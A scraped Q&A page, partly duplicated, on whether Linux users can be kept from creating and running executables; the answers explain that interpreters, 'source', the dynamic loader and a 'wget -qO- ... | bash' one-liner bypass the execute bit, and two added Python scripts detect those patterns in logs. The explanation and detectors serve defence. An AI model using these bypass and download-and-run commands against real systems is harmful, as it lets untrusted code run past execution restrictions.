Is there any way to stop a user from creating executables and running them?

12















Ransomware attacks could use zero-day exploits, but often an attacker will just fool a gullible user into running an executable by downloading and clicking.



Suppose we have a naive user and want to restrict them to the normal path. Is there any way to restrict them from creating a file with executable privilege?



Or, more generally, is there any way to build an access control list and define that this user may only execute files in this list?










  • 4





    To disable execution in this manner would prohibit users from being able to do anything on the system. There is no mechanism for this in-built to the system or even with third party software that I am aware of to do this type of security lockdown.

    – Thomas Ward
    14 hours ago












  • not answering but hint what you can do: add noexec on user writable mounts. won't prevent scripts but actual binary execution.

    – Sampo Sarrala
    1 hour ago

















permissions security executable restricted-access






edited 13 hours ago









Eliah Kagan

asked 15 hours ago









DovDov

2 Answers
17














The specific attack you've expressed concern about is:




often an attacker will just fool a gullible user into running an executable by downloading and clicking.




At least in the common case where the file is downloaded in a web browser, this should already be prevented in Ubuntu by the browser's adherence to the Execute-Permission Bit Required policy. The most directly relevant parts of that policy are:





  • Applications, including desktops and shells, must not run executable code from files when they are both:



    • lacking the executable bit

    • located in a user's home directory or temporary directory.







  • Files downloaded from a web browser, mail client, etc. must never be saved as executable.



So if a user is told to download a program in a web browser, does so, and attempts to run the file by double-clicking on it, it won't run. This applies even if the file downloaded is a shell script or even a .desktop file. (If you've ever wondered why .desktop files in your home directory have to be marked executable even though they're not really programs, that's why.)



It is possible for users to alter this behavior through configuration changes. Most will not, and while those who do probably shouldn't, that's not really what you have to worry about. The bigger concern is the more complex attack that I think you're already worried about, in which a malicious person (or bot) instructs the user to download a specific file, mark it executable themselves (through their file browser or with chmod), and then run it.



Unfortunately, restricting a user's ability to set the execute bit on a file or to execute files other than those on some whitelist wouldn't noticeably mitigate the problem. Some attacks will already work, and those that don't could be trivially modified so that they do. The fundamental issue is that the effect of running a file can be achieved even if the file doesn't have executable permissions.



This is best illustrated by example. Suppose evil is a file in the current directory that, if given executable permissions (chmod +x evil) and run (./evil), would do something evil. Depending on what kind of program it is, the same effect may be achieved by one of the following:




  • . ./evil or source ./evil runs the commands in evil.sh in the currently running shell.


  • bash ./evil runs evil in bash.


  • python3 evil runs evil in python3.


  • perl evil runs evil in perl.

  • ...and in general, interpreter evil runs evil in the interpreter interpreter.

  • On most systems, /lib64/ld-linux-x86-64.so.2 ./evil runs the binary executable evil.

None of those, not even the last one, require that the file have executable permissions or even that the user be able to give the file executable permissions.



But the malicious instructions don't even have to be that complicated. Consider this non-malicious command, which is one of the officially recommended ways to install or update NVM:



wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash


The reason that's not malicious is that NVM isn't malware, but if the URL were instead to someone's script that does evil when run, that command would download and run the script. At no point would any file need to be given executable permissions. Downloading and running the code contained in a malicious file with a single command like this is, I believe, a pretty common action that attackers trick users into taking.



You might think of trying to restrict what interpreters are available for the users to run. But there isn't really a way to do this that doesn't substantially impact the ordinary tasks you presumably want users to be able to do. If you're setting up an extremely restricted environment on which nearly everything a user would think of to do on a computer is disallowed, like a kiosk that only runs a couple programs, then this might provide some measure of meaningful protection. But it doesn't sound like that's your use case.



So the approximate answer to your question is, "No." The fuller answer is that you could probably manage to prevent users from executing any files except those that you supply on a whitelist. But that's in the strict, technical sense of "execute," which is not needed to achieve the full effect of running most programs or scripts. To prevent that, you could try to make the whitelist very small, so it didn't list any interpreters except those that could be highly restricted. But even if you managed that, users couldn't do much, and if you made it so small they couldn't hurt themselves, they probably couldn't do anything. (See Thomas Ward's comment.)



If your users can hurt themselves, they can be fooled into hurting themselves.



You may be able to restrict specific programs from being used or otherwise behaving in ways that are likely to be harmful, and if you're looking at specific patterns ransomware tends to follow, you may be able to prevent some specific common cases. (See AppArmor.) That might provide some value. But it won't give you anything close to the comprehensive solution you're hoping for.



Whatever technical measures (if any) you end up taking, your best bet is to educate users. This includes telling them not to run commands they don't understand and not to use downloaded files in situations where they wouldn't be able to explain why it's reasonably safe to do so. But it also includes things like making backups, so that if something does go wrong (due to malware or otherwise), the harm done will be as little as possible.






  • 2





    Awesome and upvoted.

    – WinEunuuchs2Unix
    12 hours ago






  • 1





    Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.

    – Peter Cordes
    1 hour ago
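
A defender's view of the answer above, as an added example that is not part of the original post: because the execute bit is never consulted on those paths, the exec log is where they become visible. This sketch parses auditd-style EXECVE/CWD records (the sample lines are constructed here) and flags an interpreter run on a file in a user-writable directory, the dynamic loader invoked directly on a file, and wget writing to stdout. The rule names, directory list and interpreter list are assumptions, and it presumes execve auditing is already enabled.

```python
import posixpath
import re

# Constructed auditd-style EXECVE/CWD records (sample data, not from the page).
# In event 304, a1 is hex-encoded, as auditd does for arguments containing spaces.
SAMPLE_LOG = """\
type=EXECVE msg=audit(1564579200.101:301): argc=2 a0="bash" a1="./evil"
type=CWD msg=audit(1564579200.101:301): cwd="/home/alice/Downloads"
type=EXECVE msg=audit(1564579201.220:302): argc=2 a0="/lib64/ld-linux-x86-64.so.2" a1="./evil"
type=CWD msg=audit(1564579201.220:302): cwd="/tmp"
type=EXECVE msg=audit(1564579202.310:303): argc=3 a0="wget" a1="-qO-" a2="https://example.invalid/install.sh"
type=CWD msg=audit(1564579202.310:303): cwd="/home/alice"
type=EXECVE msg=audit(1564579203.400:304): argc=2 a0="python3" a1=2F686F6D652F616C6963652F6D7920746F6F6C2E7079
type=CWD msg=audit(1564579203.400:304): cwd="/home/alice"
type=EXECVE msg=audit(1564579204.500:305): argc=2 a0="python3" a1="/usr/bin/lsb_release"
type=CWD msg=audit(1564579204.500:305): cwd="/"
type=EXECVE msg=audit(1564579205.600:306): argc=2 a0="ls" a1="-l"
"""

# Assumptions of this sketch: where users can write, and which interpreters matter.
USER_WRITABLE = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"sh", "bash", "dash", "python3", "perl"}
LOADER = re.compile(r"^ld-.*\.so(\.\d+)?$")   # e.g. ld-linux-x86-64.so.2
INLINE_CODE_FLAGS = {"-c", "-e", "-m"}        # next argument is code, not a file

RECORD = re.compile(r"^type=(\w+) msg=audit\(([\d.]+:\d+)\): (.*)$")
ARG = re.compile(r'\ba(\d+)=("[^"]*"|\S+)')
CWD = re.compile(r'\bcwd=("[^"]*"|\S+)')


def decode(value):
    """Quoted values are literal; unquoted values are hex-encoded bytes."""
    if value.startswith('"'):
        return value[1:-1]
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value


def parse_events(log):
    """Group records by audit event id into {'argv': [...], 'cwd': str}."""
    events = {}
    for line in log.splitlines():
        m = RECORD.match(line.strip())
        if not m:
            continue
        rtype, event_id, body = m.groups()
        ev = events.setdefault(event_id, {"argv": [], "cwd": "/"})
        if rtype == "EXECVE":
            args = sorted((int(i), decode(v)) for i, v in ARG.findall(body))
            ev["argv"] = [v for _, v in args]
        elif rtype == "CWD":
            c = CWD.search(body)
            if c:
                ev["cwd"] = decode(c.group(1))
    return events


def first_path_arg(argv):
    """First non-option argument, or None when code is passed inline."""
    for arg in argv[1:]:
        if arg in INLINE_CODE_FLAGS:
            return None
        if not arg.startswith("-"):
            return arg
    return None


def writes_to_stdout(argv):
    """True for wget -O- / -qO- / -O - / --output-document=-."""
    for i, arg in enumerate(argv[1:], 1):
        nxt = argv[i + 1:i + 2]
        if arg == "--output-document=-":
            return True
        if arg == "--output-document" and nxt == ["-"]:
            return True
        if arg.startswith("-") and not arg.startswith("--"):
            if arg.endswith("O-") or (arg.endswith("O") and nxt == ["-"]):
                return True
    return False


def classify(ev):
    """Return (rule, detail) for a suspicious exec event, else None."""
    argv = ev["argv"]
    if not argv:
        return None
    prog = posixpath.basename(argv[0])
    target = first_path_arg(argv)
    # First half of "download | shell". The shell half is just argv == ["bash"],
    # which EXECVE alone cannot tell apart from an interactive shell.
    if prog == "wget" and writes_to_stdout(argv):
        return ("download-to-stdout", target)
    if target is None:
        return None
    path = posixpath.normpath(posixpath.join(ev["cwd"], target))
    if LOADER.match(prog):
        return ("loader-direct", path)
    if prog in INTERPRETERS and path.startswith(USER_WRITABLE):
        return ("interpreter-on-user-file", path)
    return None


def findings(log):
    """List of (event serial, rule, detail) in log order."""
    out = []
    for event_id, ev in parse_events(log).items():
        hit = classify(ev)
        if hit:
            out.append((event_id.split(":")[1], *hit))
    return out


if __name__ == "__main__":
    for row in findings(SAMPLE_LOG):
        print(*row, sep="\t")
```

None of the flagged events involves a chmod or an executable file mode, which is why restricting the execute bit alone leaves them untouched.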


















0














From: In Linux, how can I prevent users from executing chown, chgrp or chmod?




chown: Already requires root.



chgrp: Users can only change into groups they themselves belong to.



chmod: Probably impossible to restrict - unless you also block all
programming language compilers/interpreters and disable any remote
filesystem access (including SFTP).



(It might be possible to block the chmod() syscall with something
like AppArmor (if it can block syscalls at all), but it would break a
whole lot of programs.)




It sounds like you've come up with a great feature request for Firefox and Chrome.









    Whatever technical measures (if any) you end up taking, your best bet is to educate users. This includes telling them not to run commands they don't understand and not to use downloaded files in situations where they wouldn't be able to explain why it's reasonably safe to do so. But it also includes things like making backups, so that if something does go wrong (due to malware or otherwise), the harm done will be as little as possible.






    share|improve this answer















    The specific attack you've expressed concern about is:




    often an attacker will just fool a gullible user into running an executable by downloading and clicking.




    At least in the common case where the file is downloaded in a web browser, this should already be prevented in Ubuntu by the browser's adherence to the Execute-Permission Bit Required policy. The most directly relevant parts of that policy are:





    • Applications, including desktops and shells, must not run executable code from files when they are both:



      • lacking the executable bit

      • located in a user's home directory or temporary directory.







    • Files downloaded from a web browser, mail client, etc. must never be saved as executable.



    So if a user is told to download a program in a web browser, does so, and attempts to run the file by double-clicking on it, it won't run. This applies even if the file downloaded is a shell script or even a .desktop file. (If you've ever wondered why .desktop files in your home directory have to be marked executable even though they're not really programs, that's why.)



    It is possible for users to alter this behavior through configuration changes. Most will not, and while those who do probably shouldn't, that's not really what you have to worry about. The bigger concern is the more complex attack that I think you're already worried about, in which a malicious person (or bot) instructs the user to download a specific file, mark it executable themselves (through their file browser or with chmod), and then run it.



    Unfortunately, restricting a user's ability to set the execute bit on a file or to execute files other than those on some whitelist wouldn't noticeably mitigate the problem. Some attacks will already work, and those that don't could be trivially modified so that they do. The fundamental issue is that the effect of running a file can be achieved even if the file doesn't have executable permissions.



    This is best illustrated by example. Suppose evil is a file in the current directory that, if given executable permissions (chmod +x evil) and run (./evil), would do something evil. Depending on what kind of program it is, the same effect may be achieved by one of the following:




    • . ./evil or source ./evil runs the commands in evil.sh in the currently running shell.


    • bash ./evil runs evil in bash.


    • python3 evil runs evil in python3.


    • perl evil runs evil in perl.

    • ...and in general, interpreter evil runs evil in the interpreter interpreter.

    • On most systems, /lib64/ld-linux-x86-64.so.2 ./evil runs the binary executable evil.

    None of those, not even the last one, require that the file have executable permissions or even that the user be able to give the file executable permissions.



    But the malicious instructions don't even have to be that complicated. Consider this non-malicious command, which is one of the officially recommended ways to install or update NVM:



    wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash


    The reason that's not malicious is that NVM isn't malware, but if the URL were instead to someone's script that does evil when run, that command would download and run the script. At no point would any file need to be given executable permissions. Downloading and running the code contained in a malicious file with a single command like this is, I believe, a pretty common action that attackers trick users into taking.



    You might think of trying to restrict what interpreters are available for the users to run. But there isn't really a way to do this that doesn't substantially impact the ordinary tasks you presumably want users to be able to do. If you're setting up an extremely restricted environment on which nearly everything a user would think of to do on a computer is disallowed, like a kiosk that only runs a couple programs, then this might provide some measure of meaningful protection. But it doesn't sound like that's your use case.



    So the approximate answer to your question is, "No." The fuller answer is that you could probably manage to prevent users from executing any files except those that you supply on a whitelist. But that's in the strict, technical sense of "execute," which is not needed to achieve the full effect of running most programs or scripts. To prevent that, you could try to make the whitelist very small, so it didn't list any interpreters except those that could be highly restricted. But even if you managed that, users couldn't do much, and if you made it so small they couldn't hurt themselves, they probably couldn't do anything. (See Thomas Ward's comment.)



    If your users can hurt themselves, they can be fooled into hurting themselves.



    You may be able to restrict specific programs from being used or otherwise behaving in ways that are likely to be harmful, and if you're looking at specific patterns ransomware tends to follow, you may be able to prevent some specific common cases. (See AppArmor.) That might provide some value. But it won't give you anything close to the comprehensive solution you're hoping for.



    Whatever technical measures (if any) you end up taking, your best bet is to educate users. This includes telling them not to run commands they don't understand and not to use downloaded files in situations where they wouldn't be able to explain why it's reasonably safe to do so. But it also includes things like making backups, so that if something does go wrong (due to malware or otherwise), the harm done will be as little as possible.







    edited 9 hours ago

























    answered 13 hours ago









    Eliah Kagan











    • 2





      Awesome and upvoted.

      – WinEunuuchs2Unix
      12 hours ago






    • 1





      Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.

      – Peter Cordes
      1 hour ago
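
The answer above lists ways a file's contents can be run without the execute bit (an interpreter, `.`/`source`, the dynamic loader, or a download piped into a shell). As a detection-side illustration, the following added example, which is not part of the original answer, flags those command shapes in logged shell command lines by checking the target file's mode. The watch lists, finding names, file names and sample command lines are assumptions constructed for the example.

```python
import os
import re
import shlex
import stat
import tempfile

# Assumed watch lists for this example; extend them for a real deployment.
INTERPRETERS = {"sh", "bash", "dash", "python3", "perl"}
SOURCE_BUILTINS = {".", "source"}
FETCHERS = {"wget", "curl"}
LOADER = re.compile(r"^ld-linux.*\.so\.\d+$")  # e.g. ld-linux-x86-64.so.2
SEPARATORS = {"|", "||", "&&", ";", "&"}


def lacks_exec_bit(path, cwd):
    """True if path is an existing regular file with no execute bit set."""
    try:
        mode = os.stat(os.path.join(cwd, path)).st_mode
    except OSError:
        return False
    return stat.S_ISREG(mode) and not mode & 0o111


def split_commands(line):
    """Yield (argv, piped_from); piped_from is the argv feeding stdin, if any."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    argv, prev, piped = [], None, False
    for tok in list(lex) + [";"]:
        if tok not in SEPARATORS:
            argv.append(tok)
            continue
        if argv:
            yield argv, (prev if piped else None)
        prev, argv, piped = argv, [], tok == "|"


def classify(line, cwd="."):
    """Return findings for one logged command line, resolved against cwd."""
    findings = []
    for argv, piped_from in split_commands(line):
        prog = os.path.basename(argv[0])
        # First non-option argument is treated as the file being run.
        target = next((a for a in argv[1:] if not a.startswith("-")), None)
        runs_code = prog in INTERPRETERS or argv[0] in SOURCE_BUILTINS
        if runs_code and target and lacks_exec_bit(target, cwd):
            findings.append("interpreter-on-nonexec")
        elif LOADER.match(prog) and target and lacks_exec_bit(target, cwd):
            findings.append("loader-on-nonexec")
        elif (prog in INTERPRETERS and piped_from
              and os.path.basename(piped_from[0]) in FETCHERS):
            findings.append("download-piped-to-interpreter")
    return findings


def demo():
    """Classify constructed command lines against files in a scratch directory."""
    samples = [
        "bash ./evil", ". ./evil", "python3 evil",
        "/lib64/ld-linux-x86-64.so.2 ./evil",
        "wget -qO- https://example.invalid/install.sh | bash",  # placeholder URL
        "bash ./tool", "ls -l evil",
    ]
    with tempfile.TemporaryDirectory() as cwd:
        # "evil" has no execute bit; "tool" does. Both contain harmless text.
        for name, mode in (("evil", 0o644), ("tool", 0o755)):
            path = os.path.join(cwd, name)
            with open(path, "w") as fh:
                fh.write("echo harmless placeholder\n")
            os.chmod(path, mode)
        return {s: classify(s, cwd) for s in samples}


if __name__ == "__main__":
    for cmd, found in demo().items():
        print(f"{cmd!r}: {found or 'no finding'}")
```

A finding marks the shape of a command, not its intent: a legitimate installer run the same way matches too, so treat the output as a prompt for review.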

























    0














    From: In Linux, how can I prevent users from executing chown, chgrp or chmod?




    chown: Already requires root.



    chgrp: Users can only change into groups they themselves belong to.



    chmod: Probably impossible to restrict - unless you also block all
    programming language compilers/interpreters and disable any remote
    filesystem access (including SFTP).



    (It might be possible to block the chmod() syscall with something
    like AppArmor (if it can block syscalls at all), but it would break a
    whole lot of programs.)




    It sounds like you've come up with a great feature request for Firefox and Chrome.






        answered 12 hours ago









        WinEunuuchs2Unix






























